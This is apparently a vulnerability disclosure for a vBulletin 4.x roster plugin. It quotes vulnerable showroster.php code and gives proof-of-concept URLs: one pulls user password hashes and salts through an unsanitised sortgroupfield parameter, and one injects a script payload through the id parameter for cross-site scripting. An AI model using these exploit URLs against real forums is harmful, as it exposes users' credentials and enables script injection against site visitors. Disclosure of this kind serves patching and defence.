Плагин: http://www.vbulletin.org/forum/showthread.php?t=235326 Версия: 4.0.10 (Последняя) Версия vB: 4.x.x #1 Data Extraction Уязвимый код в файле showroster.php: // ###GROUPCACHE################################################################# if ($userinfo['userid']) { $t = strtoupper($userinfo[$sortgroupfield]); $u = strtoupper($userinfo[$sortuserfield]); $groupcache["$t"]["$u"] = $userinfo; } As you can see, the variable $t contains the $userinfo[$sortgroupfield] value. The $sortgroupfield value is retrieved from the URL which can be changed by any user. Later on, the script iterates through the $groupcache array and assigns the variables to the showroster template. Now the problem here is that the $sortgroupfield variable is not sanitized or checked, and since the $userinfo variable contains all columns of the user table, we can extract any information of a certain user by changing the URL to something like: http://example.com/showroster.php?or...field=password or http://example.com/showroster.php?or...roupfield=salt The only downside is that the user must be shown in the roster and that you can only extract 1 column at a time. Пруф: http://example.com/showroster.php?or...field=password will show something like this #2 Cross Site Scripting The GET variable id is prone to XSS. Пруф: http://example.com/showroster.php?order=asc&sortgroupfield=field1&id= "><script>alert("XSS")</script> This will alert xss several times on the screen. Any type of HTML/JavaScript can be injected.